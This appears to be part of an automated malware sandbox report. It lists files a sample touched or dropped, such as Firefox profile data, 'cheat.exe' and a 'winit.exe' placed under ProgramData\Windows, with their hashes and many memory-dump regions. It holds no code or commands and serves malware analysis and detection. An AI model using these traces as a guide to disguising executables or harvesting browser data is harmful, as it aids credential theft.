C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\targeting.snapshot.json

Filesize
4KB

MD5
8a07c91ec93150c71a0cf30b3ae60a62

SHA1
427a625e295156acd996295efa26d96c4446afe6

SHA256
a9a78176fa19f59b82ae7d5add8e8a3a7ef32f6503e3820d3283f61891e94dc1

SHA512
6d09fde453bd0218a9af43986119962509a3b33ccee85da20543c95cb93187af10eb0fc8f43606595e045f7a9d1a57c19ab042b7cfbf73d91a4c291021237dc0

Download Submit
C:\Users\Admin\Desktop\Old Firefox Data\1bogwdvw.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite

Filesize
48KB

MD5
bf4ba8d84b04c25daf61168996f2647c

SHA1
711c3d61dd554880c5e175b0711e8764565ca757

SHA256
6924d834c5f5a503e70ac5592636f7348491c2cdd4d07431f25cbdffa72a1c61

SHA512
4286614c095286871df7fe0daed1517ef45c247c3254a5290e71ec5fce060c82678c52c381e49d4a1c0f352e4ee42d27a53dcc7e118103f58578755bc3c2095e

Download Submit
C:\Users\Admin\Desktop\Old Firefox Data\1bogwdvw.default-release\xulstore.json

Filesize
120B

MD5
05e1ddb4298be4c948c3ae839859c3e9

SHA1
ea9195602eeed8d06644026809e07b3ad29335e5

SHA256
1c2c5d5211674c3c8473e0589085499471399e53e9a85d7dd3b075fef6cbb6be

SHA512
3177b48cd0c877821419d7e5eb247a4c899bc37258994f22257ceaafefb316e6f5959faae02e380e432d7752f0218d45d56d6878c1e751d201d9fdb3ff98612e

Download Submit
C:\programdata\install\cheat.exe

Filesize
4.5MB

MD5
c097289ee1c20ac1fbddb21378f70410

SHA1
d16091bfb972d966130dc8d3a6c235f427410d7f

SHA256
b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2

SHA512
46236dba79489272b6b7f9649fb8be5beb4a0b10776adf7b67ef3a9f969a977cde7a99b1b154b4b9142eb1bf72abcadbfd38abaef1eb88d7d03c646645517d0d

Download Submit
\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
03a781bb33a21a742be31deb053221f3

SHA1
3951c17d7cadfc4450c40b05adeeb9df8d4fb578

SHA256
e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210

SHA512
010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

Download Submit
memory/3196-1564-0x000000001B4D0000-0x000000001B7B2000-memory.dmp

Filesize
2.9MB

Download
memory/3196-1572-0x000000001BBC0000-0x000000001BBD2000-memory.dmp

Filesize
72KB

Download
memory/3196-1573-0x000000001BBE0000-0x000000001BBEA000-memory.dmp

Filesize
40KB

Download
memory/3196-1574-0x000000001BBF0000-0x000000001BBFE000-memory.dmp

Filesize
56KB

Download
memory/3196-1575-0x000000001BC00000-0x000000001BC08000-memory.dmp

Filesize
32KB

Download
memory/3196-1565-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/3276-1680-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/3292-1734-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/3336-1558-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3336-1583-0x0000000000400000-0x0000000000419000-memory.dmp

Filesize
100KB

Download
memory/3360-1746-0x00000000011E0000-0x00000000012CC000-memory.dmp

Filesize
944KB

Download
memory/3360-1744-0x00000000011E0000-0x00000000012CC000-memory.dmp

Filesize
944KB

Download
memory/3524-1366-0x0000000002370000-0x0000000002A29000-memory.dmp

Filesize
6.7MB

Download
memory/3548-1489-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3548-1492-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3548-1493-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3548-1495-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3548-1494-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3548-1491-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3548-1490-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3592-1375-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3592-1368-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3592-1369-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3592-1370-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3592-1371-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3592-1372-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3592-1367-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3668-1382-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3668-1384-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3668-1381-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3668-1380-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3668-1379-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3668-1378-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3668-1377-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3724-1388-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3724-1390-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3724-1406-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3724-1387-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3724-1386-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3724-1391-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3724-1389-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3768-1396-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3768-1419-0x0000000003A00000-0x0000000003FB6000-memory.dmp

Filesize
5.7MB

Download
memory/3768-1397-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3768-1395-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3768-1394-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3768-1393-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3768-1497-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3768-1398-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3768-1420-0x00000000043B0000-0x0000000004966000-memory.dmp

Filesize
5.7MB

Download
memory/3768-1543-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/3904-1415-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3904-1417-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3904-1418-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3904-1416-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3904-1544-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3904-1498-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3904-1414-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3904-1408-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3916-1409-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3916-1410-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3916-1411-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3916-1412-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3916-1499-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3916-1421-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3916-1413-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/3932-1496-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/3948-1556-0x00000000008D0000-0x00000000008E9000-memory.dmp

Filesize
100KB

Download
memory/3948-1557-0x00000000008D0000-0x00000000008E9000-memory.dmp

Filesize
100KB

Download